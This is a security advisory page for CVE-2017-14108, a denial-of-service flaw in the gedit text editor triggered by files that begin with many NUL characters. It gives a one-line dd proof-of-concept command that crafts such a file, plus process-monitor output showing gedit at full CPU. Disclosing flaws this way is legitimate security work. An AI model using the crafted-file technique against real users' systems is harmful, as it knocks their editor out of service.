libgedit.a mishandling NUL Blocks in gedit(GNOME text editor)

2017.09.02
Credit: Hosein Askari
Risk: Low
Local: Yes
Remote: No
CWE: CWE-400


CVSS Base Score: 7.1/10
Impact Subscore: 6.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

################ #Title: libgedit.a mishandling NUL Blocks in gedit(GNOME text editor) #CWE: CWE-400 #CVE: CVE-2017-14108 #Exploit Author: Hosein Askari #Vendor HomePage: https://gnome.org , https://wiki.gnome.org/Apps/Gedit #Version : All Version (3.22.1 and older version) #Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic) #Date: 01-09-2017 #Category: Application #Author Mail : hosein.askari@aol.com #Description: libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) via a file that begins with many '\0' characters. ############### sudo echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt ################ POC: constantine@constantine:~$ pidstat -h -r -u -v -p 3107 Linux 4.4.0-93-generic (constantine) ۱۷/۰۹/۰۱ _i686_ (2 CPU) # Time UID PID %usr %system %guest %wait %CPU CPU minflt/s majflt/s VSZ RSS %MEM threads fd-nr Command 1504280041 1000 3107 16.43 0.01 0.00 0.03 106.44 1 15.53 0.00 121296 38804 0.95 4 18 gedit constantine@constantine:~$ top PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 3107 constan+ 20 0 128884 38492 28320 R 106.7 0.9 0:17.76 gedit ################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top